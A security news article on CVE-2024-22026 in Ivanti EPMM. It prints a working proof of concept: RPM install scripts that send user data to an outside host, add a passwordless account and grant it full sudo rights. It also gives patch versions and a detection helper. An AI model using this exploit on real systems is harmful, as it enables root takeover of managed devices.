PoC Exploit Released for Ivanti EPMM MobileIron Core

by Esmeralda McKenzie

A newly disclosed vulnerability, CVE-2024-22026, is present in Ivanti Endpoint Manager Mobile (EPMM), formerly MobileIron Core.

This vulnerability allows a local attacker to gain root access to affected systems.

The severity of this vulnerability is currently undetermined.

CVE-2024-22026: Local Privilege Escalation Vulnerability

The attack vector for CVE-2024-22026 is local, which means the attacker must have local access to the system to take advantage of the vulnerability, according to reports on GitHub.

Once exploited, the attacker can gain root access, which gives full control over the system and could potentially lead to major security breaches.

Discovery

The system uses the following command, run as a low-privilege user, to download and install RPM packages:

install rpm url 

This command is a CLI wrapper for the following, which runs as root:

/bin/rpm -Uvh *.rpm

It's possible to run any RPM package because the RPM command itself doesn't verify signatures or block URLs. An attacker can create a fake RPM package and deliver it to the system, making it vulnerable.

Exploitation PoC

Creating the Malicious RPM

The following command is used to create a malicious RPM package:

fpm -s dir -t rpm -n ivanti-privesc -v 13.37 -a i386 --description "Ivanti POC" --maintainer "exploit-poc" --before-install preinstall.sh --after-install postinstall.sh -C .

Preinstall Script (preinstall.sh)

#!/bin/sh
curl -O http:///poc
exit 0

Postinstall Script (postinstall.sh)

#!/bin/sh
set -e  # Enable strict error checking

# Report back current user and privilege level
CURRENT_USER=$(whoami | base64)
PRIV_LEVEL=$(id -u | base64)
curl http:///poc?user=$CURRENT_USER
curl http:///poc?priv=$PRIV_LEVEL

# Create a new root user
if ! useradd -s /bin/sh -m exploit-poc; then
  echo "Failed to add user 'exploit-poc'" >&2
  exit 1
fi
echo "exploit-poc:" | chpasswd

# Grant root privileges
if ! echo "exploit-poc ALL=(ALL) NOPASSWD: ALL" >> /etc/sudoers; then
  echo "Failed to modify sudoers file" >&2
  exit 1
fi
exit 0

Running the CLI Command to Fetch the RPM

To take advantage of the flaw, the attacker would use the command below in the CLI to download and install the malicious RPM:

install rpm url http:///ivanti-privesc-13.37-1.i386.rpm

Ivanti has released patches to address this vulnerability in versions 12.1.0.0, 12.0.0.0, and 11.12.0.1.

It's recommended that users update to these versions to mitigate the risk associated with CVE-2024-22026.
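
To check a host for the traces the PoC described above would leave (an unsigned package in the RPM database and a new NOPASSWD entry in sudoers), the following audit helpers can be used. This is an added example, not code from the article or from Ivanti; the `rpm` query format, the `%wheel` baseline and the sample data are assumptions constructed for illustration.

```sh
#!/bin/sh
# Added example, not from the article. Sample data below is constructed.
# On a live host the inputs would come from (query format is an assumption):
#   rpm -qa --qf '%{NVRA}|%{SIGPGP:pgpsig}|%{RSAHEADER:pgpsig}\n'
#   cat /etc/sudoers /etc/sudoers.d/*

# Print installed packages that carry no signature in either field.
# gpg-pubkey entries are imported keys, never signed, so they are skipped.
unsigned_packages() {
    awk -F'|' '$1 !~ /^gpg-pubkey-/ && $2 == "(none)" && $3 == "(none)" { print $1 }'
}

# Print principals granted NOPASSWD: ALL that are not in the baseline.
# $1 = space-separated list of principals expected to hold that grant.
unexpected_nopasswd() {
    awk -v allow=" $1 " '
        /^[ \t]*#/ { next }    # skip comments and #include lines
        /NOPASSWD:[ \t]*ALL/ && index(allow, " " $1 " ") == 0 { print $1 }'
}

# Constructed stand-in for the rpm query output (key ID is a placeholder).
sample_rpm_query() {
    cat <<'EOF'
bash-4.2.46-35.el7_9.x86_64|RSA/SHA256, Mon Jan  3 10:00:00 2022, Key ID 0123456789abcdef|(none)
gpg-pubkey-01234567-89abcdef.(none)|(none)|(none)
ivanti-privesc-13.37-1.i386|(none)|(none)
EOF
}

# Constructed stand-in for the sudoers content.
sample_sudoers() {
    cat <<'EOF'
# NOPASSWD: ALL in a comment must not match
root ALL=(ALL) ALL
%wheel ALL=(ALL) NOPASSWD: ALL
exploit-poc ALL=(ALL) NOPASSWD: ALL
EOF
}

echo "Unsigned packages:";          sample_rpm_query | unsigned_packages
echo "Unexpected NOPASSWD grants:"; sample_sudoers | unexpected_nopasswd "%wheel"
```

An empty result does not prove a host is clean, since a package can be removed from the RPM database after its scriptlets have run; the sudoers and account checks cover that case.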

Source credit : cybersecuritynews.com
